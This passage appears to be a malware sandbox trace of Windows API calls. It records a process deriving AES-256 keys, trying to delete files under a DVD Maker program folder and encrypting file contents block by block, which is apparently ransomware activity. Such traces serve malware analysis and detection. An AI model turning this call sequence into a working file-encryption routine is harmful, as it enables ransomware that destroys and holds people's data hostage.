maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv")) returned 0 [0153.021] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.021] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.021] CryptHashData (hHash=0x284d5a8, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.021] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.021] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23d2 [0153.021] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.024] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.025] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.025] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.034] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sports_disc_mask.png")) returned 0 [0153.041] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0153.041] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.042] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.042] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.042] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.042] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0153.042] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.046] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.046] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.046] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.047] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576black.png")) returned 0 [0153.047] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.048] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.048] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.048] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.048] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1928 [0153.048] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.051] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.051] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.051] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.057] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576_91n92.png")) returned 0 [0153.058] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.058] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.059] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.059] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.059] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb05 [0153.059] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.141] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.141] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.141] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.142] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\15x15dot.png")) returned 0 [0153.143] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.143] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.143] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.143] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.144] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15f4 [0153.144] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.146] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.146] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.146] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.147] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720x480icongraphic.png")) returned 0 [0153.148] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.148] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.148] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.149] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.149] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x143e [0153.149] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.160] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.160] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.160] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.161] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720_480shadow.png")) returned 0 [0153.162] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.162] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.162] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.162] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.163] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0153.163] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.205] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.205] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.205] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.206] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_buttongraphic.png")) returned 0 [0153.206] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.207] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.207] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.207] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.207] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0153.207] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.209] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.209] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.209] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.210] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_selectionsubpicture.png")) returned 0 [0153.211] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.211] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.211] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.211] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.211] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0153.211] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.214] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.214] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.214] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.215] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_buttongraphic.png")) returned 0 [0153.216] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.217] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.217] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.217] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.217] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0153.217] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.219] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.219] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.219] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.220] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_selectionsubpicture.png")) returned 0 [0153.220] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.221] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.221] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.221] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.221] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0153.221] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.224] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.224] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.224] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.225] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_buttongraphic.png")) returned 0 [0153.225] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.226] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.226] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.226] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.226] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0153.226] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.227] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.227] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.228] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.228] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.228] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.228] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.228] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.228] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.228] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.228] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.228] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.228] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.229] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.229] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.229] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.229] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.229] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.229] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.229] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.229] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.229] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.229] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.229] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.229] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.229] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.229] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.229] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.229] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.229] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.229] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.229] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.229] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.230] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.230] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.230] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.230] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.230] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.230] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.230] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, 